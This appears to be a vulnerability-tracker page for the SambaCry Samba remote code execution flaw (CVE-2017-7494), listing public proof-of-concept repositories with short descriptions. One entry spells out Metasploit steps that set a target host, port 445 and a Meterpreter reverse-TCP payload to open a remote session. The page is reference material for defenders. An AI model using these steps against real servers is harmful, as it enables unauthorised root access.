CVE-2017-7494CISA KEV: Actively Exploited

Samba Remote Code Execution Vulnerability

Published Mar 30, 2023·Updated Mar 30, 2023

Description

Samba contains a remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share and then cause the server to load and execute it.

Public Exploits & PoCs20 found

PoC: exploit-CVE-2017-7494

SambaCry exploit and vulnerable container (CVE-2017-7494)

308

PoC: CVE-2017-7494

Remote root exploit for the SAMBA CVE-2017-7494 vulnerability

250

PoC: cve-2017-7494

Proof-of-Concept exploit for CVE-2017-7494(Samba RCE from a writable share)

181

PoC: SambaCry

CVE-2017-7494 - Detection Scripts

62

PoC: SambaHunter

It is a simple script to exploit RCE for Samba (CVE-2017-7494 ).

43

PoC: BIT-EternalBlue-for-macOS_Linux

Exploit CVE-2017-7494 for Net Security course final Assignment. This would reveal the vulnerability of services that run in administrative priority on Linux.

3

PoC: noSAMBAnoCRY-CVE-2017-7494

CVE-2017-7494 python exploit

2

PoC: exploit-CVE-2017-7494

SambaCry exploit (CVE-2017-7494)

1

PoC: Samba-CVE-2017-7494

搭建漏洞利用测试环境

1

PoC: IS

Ovaj sto se skida isto ovaj s metasplotiom kucas msf console pa onda search CVE-2017-7494 pa use exploit/linux/samba/is_known_pipeline pa show options pa set RHOSTS (ip servera) set RPORt 445 (port za tu ranjivist) SET payload linux/x86/meterpreter/reverse_tcp SET LHOST ip kalija SET LORT 4444 pa exploit i ako je ranjiv dobijemo sesiju

PoC: cdt-vulnsamba-deploy

CDT Ansible playbook for deploying CVE-2017-7494 aka "SambaCry" to an Ubuntu box

PoC: cdt-samba-deploy

CDT Ansible playbook for deploying CVE-2017-7494 aka "SambaCry" to an Ubuntu box

PoC: cve-2017-7494-fixed

Custom Docker Image

PoC: CVE-2017-7494_SambaCry

SambaCry (CVE-2017-7494) exploit for Samba | bind shell without Metasploit

PoC: exploit-CVE-2017-7494

SambaCry exploit (CVE-2017-7494)

PoC: -CVE-2017-7494-Samba-Exploit-POC

According to researchers with Rapid7, over 110,000 devices appear on internet, which run stable Samba versions, while 92,500 seem to run unstable Samba versions, for which there is no fix. The newest Samba models, including the models 4.6.x before 4.6.4, 4.5.x before 4.5.10 and 3.5.0 before 4.4.13, was impacted by this error. May 24, 2017, Samba released version 4.6.4, which fixes a serious remote code execution vulnerability, vulnerability number CVE-2017-7494, which affected Samba 3.5.0 onwards. Vulnerab

PoC: CVE-2017-7494_IT19115344

A remote code execution flaw was found in Samba. A malicious authenticated samba client, having write access to the samba share, could use this flaw to execute arbitrary code as root.

PoC: cve-2017-7494

samba 4.5.9

PoC: cve-2017-7494

cve-2017-7494

PoC: CVE-2017-7494

CVE-2017-7494 C poc

References

View on NVD Search GitHub Search Google

Get alerted for CVEs like this

Register your stack and get notified within minutes when a matching CVE drops.

Start monitoring free